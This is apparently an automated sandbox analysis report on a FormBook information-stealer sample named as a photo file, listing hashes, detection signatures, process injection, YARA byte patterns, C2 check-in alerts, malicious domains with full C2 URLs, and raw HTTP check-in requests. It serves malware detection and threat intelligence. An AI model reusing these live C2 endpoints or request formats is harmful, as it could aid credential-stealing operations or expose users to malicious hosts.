Edit tour

Windows Analysis Report
rPHOTO09AUG2024.exe

Overview

General Information

Sample name:	rPHOTO09AUG2024.exe
Analysis ID:	1491513
MD5:	6440ceccbbdec781207b92203d4161f3
SHA1:	be51fbd7425db9a941dce835c4d05e85a4f65db2
SHA256:	9e09b85fb807bec991432ccce6a4cf6ed8aa1044803dbbd80ea1a442e6e93882
Tags:	exe
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

rPHOTO09AUG2024.exe (PID: 6068 cmdline: "C:\Users\user\Desktop\rPHOTO09AUG2024.exe" MD5: 6440CECCBBDEC781207B92203D4161F3)

svchost.exe (PID: 4368 cmdline: "C:\Users\user\Desktop\rPHOTO09AUG2024.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

eODCXMCnMwxOuMbj.exe (PID: 6920 cmdline: "C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

netbtugc.exe (PID: 4896 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)

eODCXMCnMwxOuMbj.exe (PID: 5692 cmdline: "C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 4152 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.4641575979.0000000002A80000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4641575979.0000000002A80000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.4643559111.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.4643559111.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2d666:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16d05:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2316109187.0000000007000000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2316109187.0000000007000000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2dc286:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x2c5925:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.4641284738.0000000002A10000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4641284738.0000000002A10000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2315423366.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2315423366.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.4631777519.0000000002360000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4631777519.0000000002360000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.4641065257.0000000005F60000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.4641065257.0000000005F60000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2dc286:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x2c5925:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2315722372.0000000003510000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2315722372.0000000003510000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2d063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\rPHOTO09AUG2024.exe", CommandLine: "C:\Users\user\Desktop\rPHOTO09AUG2024.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\rPHOTO09AUG2024.exe", ParentImage: C:\Users\user\Desktop\rPHOTO09AUG2024.exe, ParentProcessId: 6068, ParentProcessName: rPHOTO09AUG2024.exe, ProcessCommandLine: "C:\Users\user\Desktop\rPHOTO09AUG2024.exe", ProcessId: 4368, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\rPHOTO09AUG2024.exe", CommandLine: "C:\Users\user\Desktop\rPHOTO09AUG2024.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\rPHOTO09AUG2024.exe", ParentImage: C:\Users\user\Desktop\rPHOTO09AUG2024.exe, ParentProcessId: 6068, ParentProcessName: rPHOTO09AUG2024.exe, ProcessCommandLine: "C:\Users\user\Desktop\rPHOTO09AUG2024.exe", ProcessId: 4368, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.6 - Destination IP: 15.197.172.60

Timestamp:	2024-08-12T13:03:07.807164+0200
SID:	2050745
Severity:	1
Source Port:	54855
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.6 - Destination IP: 66.29.149.46

Timestamp:	2024-08-12T13:03:21.353702+0200
SID:	2050745
Severity:	1
Source Port:	54859
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.6 - Destination IP: 195.110.124.133

Timestamp:	2024-08-12T13:03:34.869178+0200
SID:	2050745
Severity:	1
Source Port:	54863
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.6 - Destination IP: 116.50.37.244

Timestamp:	2024-08-12T13:01:18.488813+0200
SID:	2050745
Severity:	1
Source Port:	54839
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.6 - Destination IP: 52.25.92.0

Timestamp:	2024-08-12T13:01:04.628717+0200
SID:	2050745
Severity:	1
Source Port:	54834
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.6 - Destination IP: 91.195.240.94

Timestamp:	2024-08-12T13:02:54.400290+0200
SID:	2050745
Severity:	1
Source Port:	54851
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.6 - Destination IP: 217.196.55.202

Timestamp:	2024-08-12T13:04:10.305369+0200
SID:	2050745
Severity:	1
Source Port:	54873
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.6 - Destination IP: 85.159.66.93

Timestamp:	2024-08-12T13:02:40.788859+0200
SID:	2050745
Severity:	1
Source Port:	54845
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.6 - Destination IP: 154.215.72.110

Timestamp:	2024-08-12T13:00:41.026511+0200
SID:	2050745
Severity:	1
Source Port:	54829
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.6 - Destination IP: 15.197.240.20

Timestamp:	2024-08-12T13:03:48.461240+0200
SID:	2050745
Severity:	1
Source Port:	54867
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.liangyuen528.com/fo8o/	Avira URL Cloud: Label: malware
Source: http://www.liangyuen528.com/fo8o/?wP=iiIkdrB6KYcVQoN0c6CfZniI+lK17wmUSOc41yM1Q/k97jiJcokuWPbOTxiCodGWiOQkUrp21l37eyMeLTp+RFkz+4bzDeEKKqRZgAR6qoTILtOL6EdJZhJZBnFdSPOr30I02M8=&fPh4U=MJo4	Avira URL Cloud: Label: malware
Source: http://www.elettrosistemista.zip/fo8o/	Avira URL Cloud: Label: malware
Source: http://www.kasegitai.tokyo/fo8o/?wP=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8ssmc93kihOWHWb8NTA0vbQpCHGBmxgdm5sPEbG1Wvor0LSPPjnI=&fPh4U=MJo4	Avira URL Cloud: Label: malware
Source: http://www.elettrosistemista.zip/fo8o/?wP=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMgl3a4mkxzPbkN9BQKjpJMF6ezHcknvvvjzNmyPcHDwhODu1wVk=&fPh4U=MJo4	Avira URL Cloud: Label: malware
Source: http://www.kasegitai.tokyo/fo8o/	Avira URL Cloud: Label: malware
Source: http://www.techchains.info/fo8o/	Avira URL Cloud: Label: phishing

Multi AV Scanner detection for domain / URL

Source: elettrosistemista.zip	Virustotal: Detection: 10%	Perma Link
Source: www.donnavariedades.com	Virustotal: Detection: 8%	Perma Link
Source: empowermedeco.com	Virustotal: Detection: 11%	Perma Link
Source: www.goldenjade-travel.com	Virustotal: Detection: 8%	Perma Link
Source: www.kasegitai.tokyo	Virustotal: Detection: 7%	Perma Link
Source: www.techchains.info	Virustotal: Detection: 10%	Perma Link
Source: www.empowermedeco.com	Virustotal: Detection: 5%	Perma Link
Source: www.rssnewscast.com	Virustotal: Detection: 6%	Perma Link
Source: www.magmadokum.com	Virustotal: Detection: 9%	Perma Link
Source: www.3xfootball.com	Virustotal: Detection: 9%	Perma Link
Source: www.660danm.top	Virustotal: Detection: 9%	Perma Link
Source: www.liangyuen528.com	Virustotal: Detection: 6%	Perma Link
Source: www.antonio-vivaldi.mobi	Virustotal: Detection: 9%	Perma Link
Source: www.elettrosistemista.zip	Virustotal: Detection: 7%	Perma Link
Source: http://www.empowermedeco.com/fo8o/	Virustotal: Detection: 8%	Perma Link
Source: http://www.liangyuen528.com/fo8o/	Virustotal: Detection: 6%	Perma Link
Source: http://www.elettrosistemista.zip/fo8o/	Virustotal: Detection: 8%	Perma Link
Source: http://www.magmadokum.com/fo8o/	Virustotal: Detection: 9%	Perma Link
Source: http://www.donnavariedades.com/fo8o/	Virustotal: Detection: 6%	Perma Link
Source: http://www.kasegitai.tokyo/fo8o/	Virustotal: Detection: 11%	Perma Link
Source: http://www.rssnewscast.com/fo8o/	Virustotal: Detection: 5%	Perma Link
Source: http://www.goldenjade-travel.com/fo8o/	Virustotal: Detection: 9%	Perma Link
Source: http://www.techchains.info/fo8o/	Virustotal: Detection: 10%	Perma Link

Multi AV Scanner detection for submitted file

Source: rPHOTO09AUG2024.exe	ReversingLabs: Detection: 57%
Source: rPHOTO09AUG2024.exe	Virustotal: Detection: 28%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4641575979.0000000002A80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4643559111.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2316109187.0000000007000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4641284738.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2315423366.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4631777519.0000000002360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4641065257.0000000005F60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2315722372.0000000003510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: rPHOTO09AUG2024.exe

Joe Sandbox ML: detected

Source: rPHOTO09AUG2024.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: eODCXMCnMwxOuMbj.exe, 00000003.00000002.4631782931.00000000002CE000.00000002.00000001.01000000.00000004.sdmp, eODCXMCnMwxOuMbj.exe, 00000008.00000002.4636421686.00000000002CE000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: rPHOTO09AUG2024.exe, 00000000.00000003.2166513300.0000000003950000.00000004.00001000.00020000.00000000.sdmp, rPHOTO09AUG2024.exe, 00000000.00000003.2166242342.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2219058048.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2220956043.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2315752504.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2315752504.000000000389E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4641803382.0000000002F7E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2318177102.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4641803382.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2315828615.0000000002A85000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: rPHOTO09AUG2024.exe, 00000000.00000003.2166513300.0000000003950000.00000004.00001000.00020000.00000000.sdmp, rPHOTO09AUG2024.exe, 00000000.00000003.2166242342.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2219058048.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2220956043.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2315752504.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2315752504.000000000389E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000002.4641803382.0000000002F7E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2318177102.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4641803382.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2315828615.0000000002A85000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.2315611532.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2284057968.000000000301A000.00000004.00000020.00020000.00000000.sdmp, eODCXMCnMwxOuMbj.exe, 00000003.00000003.2254805415.0000000001235000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.4634931350.000000000277E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4642290282.000000000340C000.00000004.10000000.00040000.00000000.sdmp, eODCXMCnMwxOuMbj.exe, 00000008.00000000.2389069612.00000000026AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2608020002.00000000231AC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.4634931350.000000000277E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4642290282.000000000340C000.00000004.10000000.00040000.00000000.sdmp, eODCXMCnMwxOuMbj.exe, 00000008.00000000.2389069612.00000000026AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2608020002.00000000231AC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.2315611532.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2284057968.000000000301A000.00000004.00000020.00020000.00000000.sdmp, eODCXMCnMwxOuMbj.exe, 00000003.00000003.2254805415.0000000001235000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00DA4696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00DA4696
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00DAC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00DAC9C7
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00DAC93C FindFirstFileW,FindClose,	0_2_00DAC93C
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00DAF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00DAF200
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00DAF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00DAF35D
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00DAF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00DAF65E
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00DA3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00DA3A2B
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00DA3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00DA3D4E
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00DABF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00DABF27
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0237BAB0 FindFirstFileW,FindNextFileW,FindClose,	4_2_0237BAB0

Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4x nop then xor eax, eax	4_2_02369480
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4x nop then pop edi	4_2_0236DD45
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4x nop then mov ebx, 00000004h	4_2_02B6053E

Networking

Performs DNS queries to domains with low reputation

Source:

DNS query: www.joyesi.xyz

Source: Joe Sandbox View	IP Address: 91.195.240.94 91.195.240.94
Source: Joe Sandbox View	IP Address: 154.215.72.110 154.215.72.110

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe

Code function: 0_2_00DB25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_00DB25E2

Source: global traffic	HTTP traffic detected: GET /fo8o/?wP=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnyIi7V/S5J9AzlXPHqpluzE36hxZsh30r8poflPmNwlfmk35jvL8=&fPh4U=MJo4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.3xfootball.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?wP=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8ssmc93kihOWHWb8NTA0vbQpCHGBmxgdm5sPEbG1Wvor0LSPPjnI=&fPh4U=MJo4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.kasegitai.tokyoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?wP=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxgszkgIsi8wfa6/CPqkeX1kME9DjI2TvouO65OvKk6Nl8OEvQ/8=&fPh4U=MJo4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.goldenjade-travel.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
